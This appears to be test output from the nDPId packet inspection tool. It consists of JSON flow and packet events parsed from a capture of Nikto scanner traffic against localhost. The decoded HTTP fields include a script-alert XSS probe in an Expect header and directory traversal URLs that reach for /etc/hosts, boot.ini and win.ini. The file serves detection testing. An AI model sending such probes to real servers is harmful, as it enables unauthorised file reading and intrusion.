-00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1576420276828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276828,"pkt":"AAAAAAAAAAAAAAAACABFAADICi9AAEAGMf9\/AAABfwAAAcJcH5By6zIbQafp54AYAED+vAAAAQEICp1m+4SdZvuER0VUIC9pbmRleC5qaHRtbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jhtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1576420276829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276829,"pkt":"AAAAAAAAAAAAAAAACABFAADG08RAAEAGaGt\/AAABfwAAAcJeH5AOKuv2Y8ch84AYAED+ugAAAQEICp1m+4WdZvuFR0VUIC9pbmRleC5qc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jsp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1576420276832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276832,"pkt":"AAAAAAAAAAAAAAAACABFAADGiDJAAEAGs\/1\/AAABfwAAAcJgH5Cj8LAJpHctpoAYAED+ugAAAQEICp1m+4edZvuHR0VUIC9pbmRleC54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1576420276834,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"thread_ts_msec":1576420276834,"pkt":"AAAAAAAAAAAAAAAACABFAADiGX1AAEAGIpd\/AAABfwAAAcJkH5BjVCFE0UHCd4AYAED+1gAAAQEICp1m+4qdZvuKR0VUIC9pbmRleCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om5lZ290aWF0ZSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdDogYXBwbGljYXRpb24vd2hhdGV2ZXI7IHE9MS4wDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:negotiate)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1576420276835,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276835,"pkt":"AAAAAAAAAAAAAAAACABFAADKANNAAEAGO1l\/AAABfwAAAcJmH5BoODjpUSa4iYAYAED+vgAAAQEICp1m+4udZvuLR0VUIC9+YmluIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGV1c2Vyczoga25vd24gdXNlcikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/~bin","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apacheusers: known user)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00713{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1576420276837,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420276837,"pkt":"AAAAAAAAAAAAAAAACABFAADlgjNAAEAGud1\/AAABfwAAAcJoH5AFkroJ2Lkky4AYAED+2QAAAQEICp1m+42dZvuNR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KRXhwZWN0OiA8c2NyaXB0PmFsZXJ0KHhzcyk8L3NjcmlwdD4NClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGVfZXhwZWN0X3hzcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apache_expect_xss)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1576420276839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1576420276839,"pkt":"AAAAAAAAAAAAAAAACABFAAEW4vNAAEAGWOx\/AAABfwAAAcJqH5CF6NrJzvbnOoAYAED\/CgAAAQEICp1m+4+dZvuOR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvYm9vdC5pbmklMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRpcmVjdG9yeSB0cmF2ZXJzYWwgY2hlY2spDQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/boot.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1576420276840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1576420276840,"pkt":"AAAAAAAAAAAAAAAACABFAAEXDe5AAEAGLfF\/AAABfwAAAcJsH5C64jXXMX558oAYAED\/CwAAAQEICp1m+5CdZvuQR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL2hvc3RzJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non 
Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/hosts%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7440000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00798{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1576420276841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":304,"pkt_l4_len":270,"thread_ts_msec":1576420276841,"pkt":"AAAAAAAAAAAAAAAACABFAAEi9VxAAEAGRnd\/AAABfwAAAcJuH5BHUs1h0rvodIAYAED\/FgAAAQEICp1m+5GdZvuRR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvSEFTSCgweDU1NTllODRmYmM0MCklMDAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7440000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/HASH(0x5559e84fbc40)%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7440000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1576420276842,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":297,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":297,"pkt_l4_len":263,"thread_ts_msec":1576420276842,"pkt":"AAAAAAAAAAAAAAAACABFAAEbV1RAAEAG5IZ\/AAABfwAAAcJwH5AGYW9pnm57IYAYAED\/DwAAAQEICp1m+5KdZvuSR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2lubnQvd2luLmluaSUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7440000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/winnt\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7440000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 